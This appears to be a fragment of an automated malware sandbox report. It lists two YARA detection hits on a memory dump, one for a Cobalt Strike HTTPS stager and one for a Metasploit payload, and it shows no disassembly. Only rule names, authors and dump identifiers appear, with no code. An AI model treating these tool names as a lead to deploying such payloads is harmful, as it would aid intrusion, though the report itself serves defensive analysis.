                                                                                                                                                                            • Rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86, Description: Detects CobaltStrike payloads, Source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                            No disassembly